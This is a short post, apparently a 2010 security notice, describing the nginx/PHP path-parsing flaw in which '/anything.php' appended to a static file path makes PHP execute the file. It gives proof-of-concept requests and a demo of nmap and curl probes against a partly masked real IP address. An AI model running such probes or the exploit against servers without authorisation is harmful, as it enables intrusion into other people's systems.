Nginx Security Law

Please Check your server.

<a href="http://www.80sec.com/nginx-securit.html">http://www.80sec.com/nginx-securit.html</a>

<a href="http://www.80sec.com/iis-cgifastcgi-security-hol.html">http://www.80sec.com/iis-cgifastcgi-security-hol.html</a>

Poc:

通路 http://testsite/robots.txt

HTTP/1.1 200 OK Server: nginx/0.6.32 Date: Thu, 20 May 2010 10:05:30 GMT Content-Type: text/plain Content-Length: 18 Last-Modified: Thu, 20 May 2010 06:26:34 GMT Connection: keep-alive Keep-Alive: timeout=20 Accept-Ranges: bytes

通路 http://testsite/robots.txt/80sec.php

Date: Thu, 20 May 2010 10:06:49 GMT Content-Type: text/html Transfer-Encoding: chunked X-Powered-By: PHP/5.2.6

其中的Content-Type的變化說明了後端負責解析的變化，該站點就可能存在漏洞。

示範:

pentest@ubuntu:~$ nmap -sV -p 80 218.xx.xx.205

Interesting ports on 218.xx.xx.205:

PORT   STATE SERVICE VERSION

80/tcp open  http    nginx web server 0.8.15

pentest@ubuntu:~$ curl –head http://218.xx.xx.205/images/intro.png -# | grep  “Content-Type”

0.0%

Content-Type: image/png

pentest@ubuntu:~$ curl –head http://218.xx.xx.205/images/intro.png/test.php -# | grep  “Content-Type”

Reference:

[1]http://hi.baidu.com/yuange1975/blog/item/4c223031a6727eaf5edf0e46.html

[2]http://www.laruence.com/2010/05/20/1495.html